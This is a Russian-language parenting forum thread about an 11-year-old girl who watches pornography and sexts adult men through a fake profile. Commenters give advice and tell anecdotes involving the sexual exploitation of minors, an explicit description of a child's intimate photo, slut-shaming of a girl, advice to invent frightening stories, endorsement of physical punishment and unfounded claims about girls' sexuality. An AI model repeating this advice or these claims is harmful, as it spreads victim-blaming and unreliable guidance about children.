Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-03 13:29:26 от Гость
Здравствуйте мы смужем вместе 12 лет. есть двое детей. было всякое но последнее время стала очень мучить проблема отсутствия работы у мужа я работаю. в начале отношений училась потом была в декрете но потом постоянно работала чтобы ни случилось и как ... Подробнее
Последний комментарий
История : Его прошлое
21 минуту назад2016-12-04 09:13:31 от Арийка***
21694смотрите по отношению к вам парня. но мне кажется, если у него были такие отношения с другим парнем, он будет больше тянуться к мужчинам. если только он не "би" по ориентации. но в этом случае вам будет не легче. если парень гомосексуалист, это вряд ли можно исправить. вот я о чем! Все комментарии67563
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Советы
На работу к папе
вчера в 16:30:382016-12-03 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Комедия
27 ноября в 16:31:09
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Лев
23 ноября в 17:13:44
Советы - Ребенок смотрит порно
Советы : Ребенок смотрит порно     Всем привет. Для начала всех поздравляю с наступившими и наступающими праздниками. Желаю каждому крепкого здоровья, верной любви, счастливого счастья и много денег. А теперь сама ситуация. Пишу с телефона, сори, если что не так.
Вопрос в первую очередь к мамам. Проблема касается не меня лично, а мою близкую подругу. У нее есть дочь, 11 лет. Обычная девочка, нормально учится, занимается танцами, нормальные друзья у нее, с боем, но помогает дома. В общем обычный ребенок, в меру безпроблемный. Но подругу очень беспокоит, что она смотрит порно. Причем это было бы полбеды, но она не просто смотрит порно.
Началось с того, что один раз она забыла закрыть свою страничку вконтакте. Подруга бы сама в жизни не полезла, но там была прямо открыта переписка со взрослым парнем. До этого к дочке приходила подружка и она вдвоем сидели за компьютером. И вот, постепенно все больше офигевая, подруга прочитала, как одиннадцатилетние девочки развлекаются в свободное время. Оказывается, одиннадцатилетние девочки смотрят порнушку, знакомятся в соцсетях с парнями лет 16-19, переписываются с ними на темы секса. Мало того, они просят у этих парней интим фото. И парни шлют. Моя подруга имела радость полюбоваться несколькими писюнами юных извращенцев. Причем девочки после фоток начинали издеваться над парнями, над их размерами, авторитетно заявляя, что у него маленький, и они видели намного больше.
Короче подруга была в тихом шоке, но с дочкой не поговорила, просто сделала вид, что ничего не видела. Я не считаю это правильным, но она сказала, что "не знаю как сказать и что сказать". Короче решили, что девочки просто прикалывались, все-таки переходный возраст начинается, интерес к таким вещам у подростков всегда присутствовал и все такое. Мы тоже в детстве таскали какие-то журналы, покупали какие-то карты с голыми тетками и дядьками, смотрели кассеты по видику... Интернет сейчас в этом плане детям жизнь облегчил на миллион процентов.
После этого подруга стала просматривать историю браузера, когда приходила с работы, и часто видела там порнушку и какие-то сайты такой тематики. Но последняя ситуация просто меня лично ужаснула.
Подруга удивилась, обнаружив в друзьях у дочки семнадцатилетнюю красивую девушку, которая указала, что она родная сестра дочки. Короче, опуская утомительные подробности, сразу расскажу, что выяснилось. Оказалось, что это сама дочка создала фейковую страницу, причем конкретно так создала. Натырила у кого-то много фоток, прямо много, завела много друзей, указала родственников, не подкопаешься. Странице уже несколько месяцев. С этой страницы она переписывается с мужчинами, флиртует, разводит на интимные фото. Ее многие зовут на свидания, кого-то она грубо отсылает, кому-то морочит голову, то соглашаясь, то опять перенося встречу.
Короче, как по мне, ситуация явно нездоровая и может очень плохо закончиться. Но подруга по прежнему не поговорила с дочкой. Ее аргументы в основном сводятся к тому, что если она на нее накричит, запретит, или просто скажет, что в курсе, дочка закроется, никогда в жизни ей больше ничего не расскажет, и все равно будет страдать такой фигней, просто более осторожно. Поменяет все пароли и будет подчищать историю. Даже если отобрать компьютер, она ходит к бабушке, иногда на несколько дней, ходит к подружкам в гости... Да и на сколько его отберешь? На всегда не отберешь. Все равно когда-то она опять сядет за комп и продолжит страдать херней.
И короче вот такая ситуация. Я советовала хотя бы просто провести профилактическую беседу, рассказать о том, сколько извращенцев в сети, об ужасах, которые случаются иногда с девочками, которые с ними связываются и т.д. Но подруга моя уверена, что дочка догадается, поймет, испугается и начнет шифроваться. Сейчас у подруги есть пароли от этой страницы, она регулярно просматривает сообщения, смотрит историю. То, что она видит, ее ужасно не радует, но так она хоть как-то контролирует процесс...
Короче фигня все это. Я считаю, что нужно действовать. Объяснять по хорошему, пугать страшными историями об извращенцах, если не доходит, наказывать, ограничивать доступ в интернет и соцсети... Не знаю, но, по-моему, что-то, хоть что-то нужно делать. Подруга говорит, что лучше знает своего ребенка и уверена, что этим сделает только хуже. Сейчас она хочет сходить к школьному психологу, объяснить ситуацию и вместе придумать, что делать. Возможно, устроить какое-то родительско-детское собрание в классе, чтобы психолог провела беседу со всеми детьми или как-то так...
В общем я не знаю. Рассчитываю на советы мам со стажем и вообще советы. Как правильно поступить? Как все это прекратить? Меня допустим очень пугает ситуация, что одиннадцатилетняя девочка конкретно и систематически переписывается с интернетными уродами-извращенцами. Еще не хватало, чтобы она когда-то отправилась на встречу. Короче я не знаю, очень это все как-то неправильно.
Спасибо за внимание, всем пока-пока.
62724
Другие Советы
(50)
Dевушк@
3954 Dевушк@
Dевушк@ offline
Репутация : 235993
Комментариев 1762 1
05 января 12:29:40
2016-01-05 12:29:40

Да уж сейчас дети совсем ранние.

Ну что тут посоветовать.. Говорить и читать нотации надо было раньше. Да и как 11-летний ребенок дорвался до инета, а тем более до "вконтакте"?? Там же один разврат и насилие! Не удивительно, что она уже во всю исследовала просторы инета. Сайт "вконтакте" предназначен для подростков от 14 лет. Там даже в правилах написано. Но конечно же там сидят и 9-10 летние дети. Видимо родителям пофиг на воспитание и психику их детей, раз позволяют лазить в инете без их ведома.

Мой совет, пока ребенок мал и не оч хорошо разбирается в компах, можно заблокировать порно сайты и те же видео с поро в контакте. Есть такие программы, которые блокируют порно и все что с ним связано.

Во-вторых можно установить пароль на саму винду. Но конечно же ребенок поймет, что пароль поставил родитель. И тут может начаться истерики, протесты и тд..

Для себя уяснила одно: буду как можно дольше свою дочу ограждать от инета и от соцсетей. Или же только под наблюдением.

Тут как-то писали подобные истории о том как дети переписываются со взрослыми дядями извращенцами, которые просят их голые фото и проч. Это реально пугает! Дети щас ооочень ранние! Половую жизнь начинают в среднем в 13-14 лет, в то время как мы в таком возрасте еще в куклы играли. {#} Печально всё это..

Ответить
Поддерживаю Да8 / Нет0
Полярная звезда
20241 Полярная звезда
Полярная звезда offline
Репутация : 46561
Комментариев 342 0
05 января 12:42:01
2016-01-05 12:42:01

Все дочери моих подруг, возраста примерно от 11 до 12 лет имеют свои страницы в соцсетях, и имеют бесконтрольный, со стороны взрослых, доступ к интернету в собственных телефонах. Выставляют селфи практически каждый день и частенько висят там поздно вечером, когда по сути в это время суток пора бы им уже и спать. Моя позиция по этому вопросу - я категорически против и моей дочери это запрещено, ее доступ к интернету ограничен, только если касается вопросов учебы - написание доклада. , поиск какой-то информации научной. Я пыталась объяснить своим подругам всю опасность подобных забав детей - что в соцсетях пруд пруди педофилов, под никами детей подростков, а дети очень любопытны не опытны и попасться на удочку извращенцев очень просто. Но моих подруг мои доводы не убеждают, ответ примерно такой " У них сейчас у всех страницы, у них весь класс там, они общаются". Пыталась доказать, что для общения детей существует телефон, встречи в школе и так далее.

Как то 11 летняя дочь моей подруги выставила новое селфи, прочитала комментарии, которые ей написали мальчики и пришла в ужас "Я бы вдул. Какая соска" и все в таком духе. 11 летняя девочка!!! Конечно я мигом об этом рассказала матери этой девочки, моей подруге, но реакция была какая то странная с ее стороны - мол достала я ее своими нравоучениями и это мол вообще не мое дело. Дочка другой подруги выставила новое фото - легко эротическое, где нежится в постели полуголая, девочке 12 лет. Я естественно среагировала и состоялся разговор с ее матерью, фото убрали, сказала -" спасибо, что предупредила, Я НЕ ЗНАЛА"!!!

До массового появления интернета в домах людей была безнадзорность детей, когда они шатались по улицам, по всему городу безнадзорно. Теперь появился новый тип безнадзорности - в интернете, когда дети блуждают бесконтрольно по всему интернету, смотрят все подряд, общаются со всеми подряд и так далее.

Ответить
Поддерживаю Да8 / Нет0
Dевушк@
3954 Dевушк@
Dевушк@ offline
Репутация : 235993
Комментариев 1762 1
05 января 12:48:00
2016-01-05 12:48:00

Полярная звезда, Согласна! Вообще не понимаю как можно не интересоваться родителям ЧЕМ там в инете занимаются их дети. Хоть бы историю браузера просматривали. А они начинают бить тревогу только тогда, когда по сути уже поздно. Когда ребенок уже осведомлен не хуже взрослого.

Ответить
Поддерживаю Да2 / Нет0
Дашута
17475 Дашута
Дашута offline
Репутация : 88004
Комментариев 803 2
05 января 13:08:46
2016-01-05 13:08:46

Лично я не понимаю вообще, что детям в 11 лет делать в соцсетях. Как по мне надо ставить "родительский контроль" и на комп и на телефон, пусть мультики смотрит сколько угодно, но не на голых мужиков. А конкретно этой девочке с истории, я на месте мамы, надрала бы уши, и не только уши, поудаляла бы все странички в интернете, установила бы везде родительский контроль, заблокировали бы доступ в интернет и давала бы пользоваться на 2-3 часа под присмотром взрослых, никаких походов по подружкам и если к бабушке, то тоже под жестким присмотром что бы была. Короче, нужно спасать ситуацию, потому что, ничего хорошего из нее явно не вырастет. Пусть Ваша подруга хотя бы скажет дочери, что все знает, если ограничивать не хочет, может ей хоть перед мамой стыдно станет.

Ответить
Поддерживаю Да6 / Нет0
Я так медленно иду спать,что со стороны может показаться,что я сижу в интернете...
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1663626
Комментариев 6907 36
05 января 13:33:20
2016-01-05 13:33:20

Да, я согласна со всеми. Меня тоже уивила реакция подруги. Для меня как-то дико, что можно игнорировать такую ситуацию. Я считаю, нужно хотябы дать понять ребенку, что она делает плохо, неправильно, объяснить как-то, наказать. Поговорить с родителями подружки. Ограничить интернет.

Подруга упирает на то, что она будет бояться и больше скрывать все это. С оодной стороны это тоже правильно, конечно, но и оставлять все как есть, я бы побоялась. хотя бы потому, что может все закончится очень плачевно.

Ответить
Поддерживаю Да3 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 2895502
Комментариев 17167 30
05 января 13:36:59
2016-01-05 13:36:59

Ну я не мама со стажем конечно.... У меня имеется племянник, которому 12 лет... Но он как бы и в соц. сетях практически не сидит. Его больше игры интересуют.

А то, что девочка в 11 лет, такое вытворяет, меня честно говоря шокировало..... Мне в мои 11 лет такого бы в голову не пришло... Да и сомневаюсь, что сейчас все девочки одиннадцати летки таким балуются.

Что сделать в данной ситуации? Ну мама с одной стороны права. Если она начнёт ей высказывать за это, то вряд ли девочка прекратит свои такие занятия. Она просто осторожнее будет. И у матери не будет больше возможности хоть как-то контролировать это.

Я считаю, что можно сделать так. Придумать некую историю. В которой, допустим 13 летняя девочка, знакомилась с взрослыми парнями по интернету. Они ей присылали интимные фото. А потом, как-то раз, ту девочку крадут, к примеру. Мол один парень, с которым она общалась, каким-то образом нашёл её. А потом похитил и в общем закрыл в подвале. Её три года не могли найти, а когда нашли, зрелище было не для слабонервных. Вообще, лучше нечто подобное преподнести более естественно. Может вам с её мамой стоит начать обсуждать эту историю при ней.

Ответить
Поддерживаю Да5 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Султан
Султан

05 января 13:52:02
2016-01-05 13:52:02
Я в шоке у меня всегда папа проверял чем я занимаюсь за компом) и я благодарен ему за это
Ответить
Поддерживаю Да2 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1663626
Комментариев 6907 36
05 января 13:56:13
2016-01-05 13:56:13

Блондиночка , Еще буквально перед новым годом произошла ситуация. Очень странная по-моему.

Звонит дочка подруге и говорит, что пойдет ночевать к бабушке с дедушкой. В этом нет ничего странного, она туда ходит, иногда на несколько дней, они еще пару лет назад жили у родителей все вместе, у нее там друзья, поэтому ничего странного. Но Вика (подружка) говорит, что поняла, что с дочкой что-то не так, какой-то странный голос. Время было где-то 4-5 часов вечера, сумерки, почти темно. Родители подруги ехали с дачи и должны были заехать к ним домой, завести там что-то, и дочка сказала, что дождется их и поедет с ними. Сказала, что стоит на улице, у магазина, и подождет их здесь. Подруга перезвонила родителям, они сказали, что приедут где-то через час только. Короче Вика сказала, чтобы дочка шла домой, но та категорически отказывалась. Уперлась, буду ждать под магазином и все. Вика не нее накричала и заставила идти домой, типа нефиг час торчать под магазином, если до дома 5 минут.

Потом муж Вики рассказал, что когда они приехали с родителями, дочка сидела в свой комнате, без света, под одеялом(что вообще на нее не похоже) и была очень странная какая-то. Она уехала к родителям. Прошло пару дней, но она не хотела возвращаться домой. Ничего не объясняла, просто не хотела и все. Потом позвонила и загробным голосом сказала, что ей нужно 60 гривен, она нашла какую-то бабку (!) и хочет, чтобы ее к этой бабке отвели, мол она перепуганная и всего боится. Ну понятно, Вика поняла, что что-то случилось, начала на нее давить. Дочка расплакалась навзрыд, "Мамочка только не ругайся, умоляю". Короче в тот день, когда она уехала к бабушке с дедушкой, они с той же подружкой гуляли во дворе. Они живут в частном секторе, но прямо возле их переулка одна из центральных улиц, девятиэтажки, дворы, детвора, детские площадки. Там они играли, и по словам дочки к ним с подружкой пристал какой-то дядька. Девочка рыдала так, что Вика уже решила, что случилось вообще черте что. Короче дочка сказала, что он достал "писюн" и начал просить их потрогать, бегать за ними по дворам и всякое такое. Тогда они выбежали к этому магазину, она на проспекте, атм всегда людно, подружка пошла домой, а дочка как раз тогда и звонила Вике, и говорила, что будет здесь ждать бабушку с дедушкой. И после этого она боялась возвращаться домой от бабушки с дедушкой, ей казалось, что он ее будет ждать там во дворах. У ребенка реально травма психологическая. Перепуганная ужасно.

Короче ужас. Может и правда повезло детям нарваться на извращенца, но я вот думаю, может у меня паранойя уже, но могло же быть, что эти 2 дурищи назначили кому-то встречу, хотели посмотреть со стороны, посмеяться, а он их как-то вычислил и начал за ними бегать и приставать. Понятно, что никто нормальный на такие секс-встречи не придет. Только шизанутые извращенцы.

Эта ситуация меня очень беспокоит. Я ребенка знаю с трех лет, у меня за нее душа болит, и мне очень не нравится, что происходит.

Ответить
Поддерживаю Да4 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Гость из Закарпатья
14699 Гость из Закарпатья
Гость из Закарпатья offline
Репутация : 192313
Комментариев 1379 3
05 января 14:03:37
2016-01-05 14:03:37

Я тоже пока еще не мама. Но полностью и всецело поддерживаю мнение всех что срочно надо принимать меры! Нельзя все оставить на самотек. Мало ли чем может закончиться такая история с девочкой.... Читаю всякие подобные истории и страшно рожать ребенка... Очень тяжело воспитать нормальным человеком ребенка в современном мире, где разврат стал чем-то обыденным. Желаю вашей подруге мудрости чтобы правильно решить данную непростую ситуацию!

Ответить
Поддерживаю Да2 / Нет0
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 2895502
Комментариев 17167 30
05 января 14:08:03
2016-01-05 14:08:03

Сиреневая Кошка, а я когда читала, то тоже подумала о том, что может они с подругой сами этому извращенцу и назначили встречу... Хотели посмотреть, что и как будет... Да и он мог вполне в интернете выдавать себя за 16-летнего красавца парня, а на деле оказаться престарелым извращенцем. Тем более такие случае случались и ни раз. Когда вот такие дяденьки педофилы , выманивали на встречу маленьких девочек, выдавая себя за кого-то другого.

На самом деле, то, чем занимается эта девочка, ну очень опасно. Не столько тем, что она переписки такие ведёт, как тем, что может попасть в ситуацию ужасную.

Конечно что-то с этим делать нужно, но аккуратно.....

Нашли же себе девочка занятие, однако....

Ответить
Поддерживаю Да2 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Гость из Закарпатья
14699 Гость из Закарпатья
Гость из Закарпатья offline
Репутация : 192313
Комментариев 1379 3
05 января 14:10:49
2016-01-05 14:10:49

Сиреневая Кошка, вполне может быть что сами назначили встречу и не думали о последствиях...

Ответить
Поддерживаю Да1 / Нет0
Льоська
10900 Льоська
Льоська offline
Репутация : 47892
Комментариев 660 0
05 января 16:17:23
2016-01-05 16:17:23

как по мне родительский контроль на браузер плюс контроль мобильного интернета через комп и беседа и проблема решена, и наверное поговорить с родителями близких подруг, что б и там был родительский контроль

Ответить
Поддерживаю Да2 / Нет0
Делай так , как подсказывает сердце!
Осенняя
17330 Осенняя
Осенняя offline
Репутация : 401434
Комментариев 2258 2
05 января 16:54:51
2016-01-05 16:54:51

Нас всех воспитывали на стихах Что такое хорошо и что такое плохо. Сейчас все эти заповеди, о том что плохо рвать книжки и не чистить зубы давно устарели . сейчас надо почти с пеленок учить, особенно девочек, что такое прилично и неприлично. Надо объяснять, что когда девочка вырастет может смотреть, трогать и интересоваться физиологии женской и мужской, сколько её душенька пожелает. Но сейчас, в период детства, смотреть "клубничку", не то что неприлично, а просто безнравственно для детской психики. Родителям надо повысить контроль за девочкой, может даже читать нотации. Обязательно должен поговорить папа.
Много лет назад, моя сотрудница удочерила девочку. И вот так же, когда девочке было 12 лет сотрудница застукала её за просмотром порно. Поругала, девочка сказала, что больше ни-ни. Сотрудница жила с мужчиной на 10 лет моложе себя, и когда она стала замечать, что дочь откровенно крутит перед ним задницей в 13 лет устроила скандал с битьём посуды. Потом ей муж сказал, что от девочки были постоянные намеки на секс и порнуху вместе с ним предлагала посмотреть. В конце концов он ушел от сотрудницы, потому что, как сказал, ему стало противно жить рядом с малолетней шалавой. Итог:девочка в 15 лет родила, сотрудница воспитывает внука сама, а приёмная дочь обслуживает наш небольшой городок и близ лежащие районы к тому же пьёт и это в 26 лет. Я не хочу сказать, что обязательно, если смтотреть порно в 10 лет потом можно стать легкодоступной девицей, но прекратить эти просмотры обязательно надо.

Ответить
Поддерживаю Да3 / Нет0
Moody
20123 Moody
moody offline
Репутация : 138642
Комментариев 1220 7
05 января 17:19:25
2016-01-05 17:19:25

Не хочу пугать вас, но год назад в нашем городе произошла ужасная история. Девочку 14 лет убила молодая пара. Девушка из этой пары решила на день рождения своему парню преподнести девственницу, познакомилась в вк с молодой девочкой, напросилась с ней погулять, в общем выманила ее из дома, потом когда они уже встретились, она предложила ей переночевать у нее, мол родителей нет, боится. Девочка ее пожалела, позвонила родителям и наврала, что идет к однокласснице с ночевкой. Родители на свою беду поверили. Позже выяснилось, девочка отлично училась, не обманывала, да и гулять не гуляла. В общем заманили ее, издевались всю ночь, а потом убили, чтобы не рассказала никому. Их нашли за два дня, весь город в шоке был.

Поэтому соц. сети не должны быть в свободном доступе. Да и с ребенком нужно постоянно разговаривать на эту тему. Сейчас трудно сказать как переломить ситуацию. Если ей это интересно, может сесть с ней и по взрослыму поговорить, рассказать про секс, пусть вопросы задает. Это все от любопытства, которое ей хочется удовлетворить. Поговорить надо, но не рассказывать о том, что мама знает о ее просмотрах порно. Сказать, что с сексом лучше не торопиться, о маньяках разных рассказать, ну маме перед этим с психологом надо поговорить , как лучше донести до ребенка.

Ответить
Поддерживаю Да2 / Нет0
Все люди хотят, чтобы было по ихнему. Но по ихнему не будет, потому что нет такого слова.
кинокефал трисмегист
18156 кинокефал трисмегист
кинокефал трисмегист offline
Репутация : 10847
Комментариев 751 23
05 января 18:29:24
2016-01-05 18:29:24

щастливое время било в ссср когда не било интернета порнографии

Ответить
Поддерживаю Да0 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
05 января 18:51:31
2016-01-05 18:51:31

Поддерживаю ваши все комментарии.

У меня конечно нет дочки. Я тоже хочу кое что рассказать о подобном.

Моему младшему 12. Он мне порой как что расскажет об одноклассниках, так волосы дыбом встают. Месяц назад рассказал одну ситуацию. Обычно дети о таком не рассказывают родителям. Но я своего приучила делится. Я офигела.

Так вот. Приходит он из школы и говорит.

Мама представляешь, что у нас сегодня было?Я говорит в шоке. Я говорю и что же?Никак не ожидала подобное услышать.

Он говорит ты знаешь же такого то мальчика из моего класса?Я говорю ну. Он говорит в контакте фото выложил. А мой там хоть и регистрировался но давно там не сидит. У них есть группа там для их класса для домашнего задания и расписания. Но кто бы знал что там творится?Я в том году как то зашла и офигела. Что там они пишут?При чем мама одной девочки и классная руководительница их в том учебном году способствовали созданию такой группы. Понятно что там только одноклассники и взрослые не подозревали чем все закончится. А зря.

Так вот к той истории вернусь.

Оказывается тому мальчику пара одноклассниц предложили сделать интимное фото и выложить. А тот дурачек взял и сделал что просили.

Представьте ребенка 12 лет без трусов с раздвинутыми ягодицами и смотрящим себе между ног?Я чуть не поседела от того как услышала такое.

Я говорю вот мама то его не знает. Надрала б и наказала. А мой ребенок говорит. А она знает и видела. Я говорю и что?Наказала?А он мне нет. Она сказала чтоб он его на главное фото поставил. Вот и родители. Да еще работающие с детьми сами.

Судите сами об данной истории.

А моему показал в школе его одноклассник и весь класс весь день обсуждал и хохотал над той фотографией. Мне даже неудобно стало.

Я говорю он сам то дурак что ли?Ему сказали а он сделал?Если его попросят спрыгнуть с крыши наверно так и сделает.

И со своим поговорила. Он мне сказал что сам бы такого никогда не сделал и ему стыдно было бы.

Так что учите детей делится с вами. И ведите разговорю что можно а что нельзя.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1095302
Комментариев 16103 6
05 января 18:56:45
2016-01-05 18:56:45

Вчера случайно увидела, как девочка 14 лет продает свои интим фото. Я пришла в шок. Уверена, что есть и более юные "продавщицы" и ни только фото!

В ужасе я была и когда соседские девочки 10-11 лет рассказывали мне про своих парней и бывших парней.

Но тут ситуация у тебя не лучше. Я, конечно, понимаю, что дети ранние сейчас, но это уже явный перебор. Они же не до конца понимают ту опасность, что может им грозить, они просто недооценивают тех извращенцев, которые могут им попасться. Тут и взрослым то опасность может грозить, что уж про детей говорить.

На счет психолога то она права, посоветоваться с психологом не помешает, а вот что ничего она не делает, вот это печально. Нет, я, конечно, согласна, что если она начнет наезжать на девочку, то та просто станет осторожна, поменяет пароли и все, но и ничего не делать нельзя, случится что и потом уже будет поздно. Они же реально могут додуматься пойти на встречу и ладно если только изнасилуют, а ведь могут убить, расчленить и в лесу похоронить.

Пусть психолог с ними беседу проведет, он точно знает, как лучше преподнести. А так то было бы не плохо, чтоб психолог, ну или сами где почитали, а как оно бывает, чем все это может закончиться, что это все не весело совсем, а может закончиться очень печально!

У нас, например, у оператора интернета есть такая услуга, как "Родительский контроль", там блокируется доступ к ненужным сайтам, да и вообще, родители могут следить за детьми. Стоит на самом деле все это очень не дорого, я сама лично видела, но зато эффективно. А также есть у нашего оператора специальные тарифные планы для детей, там также введены ограничения по просмотру сайтов!

Также есть сторонние программы, которые могут заблокировать к порно-сайтам и даже просто доступ к ВК!

11 лет - это как-то уж рано для порно (по крайней мере по моим меркам)! Совсем ни тем она занята в свои 11 лет! А потом мы еще удивляемся, что они в 14 рожают! А что удивляться, когда они таким в 11 занимаются!

Может я очень критична сейчас, но я считаю, что нельзя все это на самотек то пускать! Мы взрослые, а они дети, глупые, неразумные, которые мнят себя взрослыми, но дети! Вспоминаю себя, я хоть порно не смотрела, с извращенцами не переписывалась, но считала себя взрослой, вот и она я более, чем уверена, что считает, а на деле ума еще нет, тем более в 11 то лет!

Мне интересно, а как твоя подруга проследит ту грань, где встречи мифические (где она их бесконечно переносит), на которые она не пойдет и встречи реальные? Когда она реально сходит, тогда может стать слишком поздно, да и в конце концов подруга твоя не может следить за каждым прям шагом дочери! То, что она посмотрит раз браузер и переписку как-нибудь вечером, так что это даст? Она возьмет утром после школы договорится, когда твоя подруга на работе и все! Да мало ли что ей в голову придет! Все это очень страшно на самом деле!

Ответить
Поддерживаю Да3 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1095302
Комментариев 16103 6
05 января 18:59:24
2016-01-05 18:59:24

Дашута, прости, только увидела, что ты тоже писала про "Родительский контроль", просто не прочитала комментарии до, чтоб с мыслей не сбивали.

Ответить
Поддерживаю Да0 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Гость
Гость

05 января 20:09:46
2016-01-05 20:09:46
У самой вашей подруге страничка в соц. сетях есть? Она выкладывает свои фото? Обсуждает ли чужие и свои фото с интимными подробностями? Мало толку от нравоучений будет, если мама, что-то подобное себе сама позволяет. У детей своя логика. Если родители так делают - значит это можно, или можно для взрослых. А какой ребенок не хочет казаться взрослее и признает себя еще ребенком?
Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

05 января 20:10:20
2016-01-05 20:10:20
Для 11 летней такое увлечение не нормальное явление. Тут больше чем интерес. Что с семьей девочки? Может у матери есть любовник? Девочка из полной семьи или нет? Может у нее отчим? Допускает ли мать при дочери разговоры о свиданиях с мужчинами, с интимными сексуальными подробностями, или контекстом? Не слишком ли откровенно одевается мама? Такое не берется ниоткуда. Изначально интерес появляется в семье. Возможно где-то желание быть взрослой, поэтому копирует какое-то поведение матери. Даже если говорить об окружении среди подростков, то, что бы попасть в определенный круг надо иметь определенные нормы изначально. Поэтому скорее всего в семье девочки слишком сексуально распотрошены. Может быть другой вариант , это чрезмерное ханжество, оно тоже может привести к такому результату. Но если бы мать была больше ханжой, то не то, что разговоры, девочку ждала бы порка. Конечно в первую очередь надо разговаривать с девочкой, объяснять ей как опасное ее поведение, как оно аморально и может отразиться на ней в будущем. Это можете сделать и вы, в нейтральной форме. Надо не просто смотреть странички, но ставить родительский контроль, запрет на сайты, это можно сделать с помощью дополнений в самом браузере даже. Ну и разумеется нужно пересмотреть само поведение и морально этические нормы в семье, где-то была допущена колоссальная ошибка. Подведение матери не нормально в такой ситуации. Как не желание говорить с ребенком, не тем более выводить данную тему на школьное собрание. Дети не дураки, они догадаются где может быть собака зарыта, тогда проблем будет только больше.
Ответить
Поддерживаю Да0 / Нет0
прокурор
19659 прокурор
Прокурор offline
Репутация : 29168
Комментариев 230 1
05 января 20:11:50
2016-01-05 20:11:50

Я думаю что не надо к девочке лезть с разговорами. Большая вероятность того, что это не поможет, а наоборот, еще и навредит. Думаю что девочку нужно чем-то занять. Лучше всего каким-нибудь видом спорта. Танцы, как я понимаю, не помогают. Нужно ее так плотно занять, чтобы у нее не было времени на интернет. Это может еще быть изучение языков, кроме спорта. Надеюсь что у подруги есть на это финансы.

Все это требует осторожности и ума. На спорт девочку надо вести не насильно, а хорошо им заинтересовать. Показать видео с акробатическими выступлениями, что то рассказать об этом. Вы тоже можете как-бы между прочим об этом упоминать когда гостите в подруги. Об извращенцах и на эту тему вообще, считаю, сейчас говорить не нужно. Дети ведь не глупые. Поймут, что родители обо всем узнали. Пусть подруга и дальше будет в курсе, что девочка вытворяет в сети. И пусть при этом себя не выдает. Вот после Рождества пусть заведет девочку на спортивную секцию, желательно чтобы в той секции было минимум мальчиков и тренером была женщина. Ну и здесь нужно подождать месяц-другой.

Если подобная активность в сети уменьшится - значит помогло. Если нет - то да. Вот тогда уже нужно решаться на разговоры, беседы с психологом, консультации врача и т. д. Просто если не поможет, это значит, что психологическая травма глубже и сложнее, и просто так она не исчезнет. Если будете принимать эти меры, нужно понимать что критика, упреки, осуждения и скандалы категорически исключены. Нужно показать ребенку что его понимают. Что ему помогут с этим справиться. Что он может доверять родителям все, и при этом он не услышит от них оскорблений и осуждений.

Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

05 января 20:50:35
2016-01-05 20:50:35
прокурор, Вы путаете влияние спорта на мужчин и женщин. Если для парней это сможет сработать, то для девушек спорт только повышает либидо. Ну и такие увлечения переносом внимание не убрать. Ребенку в конце концов 11 лет, а не 5.
Ответить
Поддерживаю Да3 / Нет0
Самер
18787 Самер
Самер offline
Репутация : 27620
Комментариев 227 4
05 января 20:55:07
2016-01-05 20:55:07

Вообще бред какой-то!! Мама девочки явно перегибает со своим "замкнется в себе, закроется и т. д. " Вот честно, не пойму никогда... Девчонке 11 лет, смотрит порно, общается с какими-то извращенцами, смотрит их "достоинства" (что б не сказать грубее). И маман считает что это какой-то там переходной возраст и нужно быть с дочуркой лояльней... Не на мой характер это все!! "Летела б" у меня эта дочурка кувырком и впрыпрыжку... Я реально устроила бы крутые разборки по этому поводу, так как считаю: что именно в переходной возраст нужно ребенка "хорошо и крепко держать и направить в "правильное" русло. А таким "жеванием соплей" со стороны мамы - явно нечего путнего с нее не выйдет!! Через 2-3 годка, просто пойдет по рукам. Это моя точка зрения на эту ситуацию!

Р. S, а молодежь (в лице мужчин) то нынче переводится.. Абы ото "писюнами" хвастаться... Как говорится: "Раденькі шо дурненькі"

Ответить
Поддерживаю Да3 / Нет0
"Не гоняйся за счастьем, оно всегда находится в тебе самом..."
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7612 30
05 января 21:07:05
2016-01-05 21:07:05

Да нарватся на изврашенца запросто в интернете. Смотрят все подряд народ в интернетах и потом вытворяют черте что. И пофиг им что там ребенок чей то.

Я думаю что дети должны быть предупреждены о подобном. Чем может подобное закончится. Им конечно весело. Мол мы взрослые уже. А ведь на деле не понимают к чему приводит такая взрослость.

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Осенняя
17330 Осенняя
Осенняя offline
Репутация : 401434
Комментариев 2258 2
05 января 22:02:15
2016-01-05 22:02:15

